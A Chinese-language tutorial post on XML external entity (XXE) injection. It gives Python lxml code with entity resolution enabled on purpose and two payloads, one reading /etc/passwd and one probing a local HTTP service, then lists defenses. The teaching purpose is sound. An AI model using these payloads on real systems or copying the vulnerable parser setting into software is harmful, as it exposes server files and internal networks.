利用 XML 外部实体注入(XXE)读取文件和探测内部网络

利用 XML 外部实体注入(XXE)读取文件和探测内部网络

引言

XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

什么是 XXE?

XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。

代码示例

以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

python 复制代码
from lxml import etree
import requests

# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

def parse_xml(xml_bytes):
    try:
        # Parse the XML bytes with lxml, which supports external entities
        parser = etree.XMLParser(resolve_entities=True)
        root = etree.fromstring(xml_bytes, parser=parser)
        methodname = root.find('methodname').text
        print(methodname)
    except Exception as e:
        print(f"Error: {e}")

# Parse the first XML string
parse_xml(x)

# Parse the second XML string
parse_xml(x1)

代码解析

  1. XML Payload:

    • xx1 是两个字节字符串,分别包含外部实体 &xxe;
    • x 中的外部实体指向 /etc/passwd 文件。
    • x1 中的外部实体指向 http://127.0.0.1:8000
  2. 解析函数:

    • parse_xml 函数使用 lxml.etree.fromstring 解析字节字符串,并打印 <methodname> 元素的内容。
    • etree.XMLParser(resolve_entities=True) 参数启用外部实体解析。
  3. 解析 XML 字符串:

    • 调用 parse_xml(x) 解析第一个 XML 字节字符串,读取 /etc/passwd 文件内容。
    • 调用 parse_xml(x1) 解析第二个 XML 字节字符串,探测 http://127.0.0.1:8000 的内容。

运行结果

当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。

如何防御 XXE 漏洞

为了防止 XXE 漏洞,可以采取以下措施:

  1. 禁用外部实体解析 :在解析 XML 时,禁用外部实体解析功能。例如,在 lxml 中,可以使用 etree.XMLParser(resolve_entities=False)
  2. 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
  3. 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
  4. 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。

结论

通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。

相关推荐
qq_171538852 分钟前
TCP/IP协议精解:IP协议——互联网世界的邮政编码系统
网络·网络协议·tcp/ip
珹洺13 分钟前
计算机网络:(七)网络层(上)网络层中重要的概念与网际协议 IP
网络·tcp/ip·计算机网络
兮动人1 小时前
获取终端外网IP地址
java·网络·网络协议·tcp/ip·获取终端外网ip地址
怦然星动_1 小时前
eNSP中实现vlan间路由通信(路由器)
网络·智能路由器
ddfa12342 小时前
XML 笔记
xml·服务器
zyx没烦恼3 小时前
TCP相关实验
服务器·网络·tcp/ip
(:满天星:)13 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos
野蛮人6号14 小时前
虚拟机网络编译器还原默认设置后VMnet8和VMnet1消失了
网络·vmware·虚拟机网络编译器·vmnet8消失
scuter_yu15 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司15 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全